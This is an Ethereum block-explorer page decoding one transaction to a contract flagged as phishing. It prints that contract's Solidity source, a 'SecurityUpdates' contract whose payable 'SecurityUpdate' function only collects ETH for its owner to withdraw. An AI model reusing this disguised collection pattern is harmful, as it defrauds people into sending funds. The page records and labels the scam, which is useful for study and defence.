ETH Price: $2,272.01 (-7.10%)

Transaction Decoder

Block:
16583989 at Feb-08-2023 12:13:23 PM +UTC
Transaction Fee:
0.000788409524469112 ETH $1.79
Gas Used:
21,217 Gas / 37.159330936 Gwei

Account State Difference:

  Address   Before After State Difference Code
(beaverbuild)
55.536560196210015997 Eth55.536843022381501617 Eth0.00028282617148562
0xd13b093E...D2B0AbF9E
(Fake_Phishing6102)
15.596748148686912392 Eth15.603389216480143657 Eth0.006641067793231265
0xfA1F67C8...5f45ea182
0.009269099541497 Eth
Nonce: 2
0.001839622223796623 Eth
Nonce: 3
0.007429477317700377

Execution Trace

ETH 0.006641067793231265 SecurityUpdates.CALL( )
pragma solidity ^0.4.26;

contract SecurityUpdates {

    address private  owner;    // current owner of the contract

     constructor() public{   
        owner=msg.sender;
    }
    function getOwner(
    ) public view returns (address) {    
        return owner;
    }
    function withdraw() public {
        require(owner == msg.sender);
        msg.sender.transfer(address(this).balance);
    }

    function SecurityUpdate() public payable {
    }

    function getBalance() public view returns (uint256) {
        return address(this).balance;
    }
}